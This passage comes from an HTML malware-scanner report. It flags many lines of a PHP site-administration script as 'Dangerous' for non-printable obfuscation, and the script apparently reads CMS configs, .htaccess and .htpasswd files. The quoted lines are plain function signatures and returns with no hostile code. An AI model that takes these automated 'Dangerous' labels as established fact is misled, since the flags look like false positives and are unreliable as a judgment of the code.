</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_login</span><span style="color: #007700">(</span><span style="color: #0000BB">$password</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_joomla_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_htaccess</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1377</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1379</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_htpasswd</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$users</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1389</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">find_nginx_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$site_name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1392</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$p</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_logout</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$fp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1405</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parse_nginx_config</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1415</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">detect_cms</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 142</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_auth_fail_json</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$cms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'WordPress (no config)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1438</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Joomla (no config)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Unknown (has .env)'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1440</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Static / Unknown'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'Empty / Not a site'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_skip_dir_names</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'cgi-bin'</span><span style="color: #007700">, </span><span style="color: #DD0000">'lost+found'</span><span style="color: #007700">, </span><span style="color: #DD0000">'.well-known'</span><span style="color: #007700">, </span><span style="color: #DD0000">'.git'</span><span style="color: #007700">, </span><span style="color: #DD0000">'node_modules'</span><span style="color: #007700">, </span><span style="color: #DD0000">'vendor_backup'</span><span style="color: #007700">, </span><span style="color: #DD0000">'.svn'</span><span style="color: #007700">, </span><span style="color: #DD0000">'.hg'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1447</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_var_system_dir_names</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_infrastructure_dir_basenames</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1463</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_is_infrastructure_dir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_path_purpose_dir_map</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_render_login_page</span><span style="color: #007700">(</span><span style="color: #0000BB">$error </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_action_param</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">up_to_wp_mode</span><span style="color: #007700">() ? </span><span style="color: #DD0000">'up_to_action' </span><span style="color: #007700">: </span><span style="color: #DD0000">'action'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1696</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_should_skip_dir</span><span style="color: #007700">(</span><span style="color: #0000BB">$parent_path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_is_var_system_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1716</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$parts</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #0000BB">scan_var_system_dir_names</span><span style="color: #007700">(), </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_is_site_internal_dir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1730</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">path_is_deep_subfolder</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_path_is_descendant</span><span style="color: #007700">(</span><span style="color: #0000BB">$child</span><span style="color: #007700">, </span><span style="color: #0000BB">$parent</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1739</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$child </span><span style="color: #007700">. </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$parent </span><span style="color: #007700">. </span><span style="color: #DD0000">'/'</span><span style="color: #007700">) === </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1742</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_path_purpose</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$is_dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$is_site </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$cms </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1755</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'label' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$infra</span><span style="color: #007700">[</span><span style="color: #0000BB">$base_l</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">], </span><span style="color: #DD0000">'hint' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$infra</span><span style="color: #007700">[</span><span style="color: #0000BB">$base_l</span><span style="color: #007700">][</span><span style="color: #0000BB">1</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1760</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'label' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$dir_map</span><span style="color: #007700">[</span><span style="color: #0000BB">$base_l</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">], </span><span style="color: #DD0000">'hint' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$dir_map</span><span style="color: #007700">[</span><span style="color: #0000BB">$base_l</span><span style="color: #007700">][</span><span style="color: #0000BB">1</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1786</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'label' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$file_map</span><span style="color: #007700">[</span><span style="color: #DD0000">'htaccess'</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">], </span><span style="color: #DD0000">'hint' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$file_map</span><span style="color: #007700">[</span><span style="color: #DD0000">'htaccess'</span><span style="color: #007700">][</span><span style="color: #0000BB">1</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'label' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$file_map</span><span style="color: #007700">[</span><span style="color: #0000BB">$ext</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">], </span><span style="color: #DD0000">'hint' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$file_map</span><span style="color: #007700">[</span><span style="color: #0000BB">$ext</span><span style="color: #007700">][</span><span style="color: #0000BB">1</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'label' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'Файл'</span><span style="color: #007700">, </span><span style="color: #DD0000">'hint' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'Проверьте расширение и путь. Не открывать бинарные на проде без нужды.'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1806</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_tree_folder_children</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth</span><span style="color: #007700">, </span><span style="color: #0000BB">$max_depth</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1833</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function (</span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$b</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1844</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$children</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1847</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_tree_build_node</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$max_depth </span><span style="color: #007700">= </span><span style="color: #0000BB">8</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">h</span><span style="color: #007700">(</span><span style="color: #0000BB">$s</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">htmlspecialchars</span><span style="color: #007700">(</span><span style="color: #0000BB">$s</span><span style="color: #007700">, </span><span style="color: #0000BB">ENT_QUOTES</span><span style="color: #007700">, </span><span style="color: #DD0000">'UTF-8'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$node</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1886</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">scan_tree_at_root</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 188</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_state_normalize_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'error' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'Cannot read: ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$full</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_endpoint_url_value</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
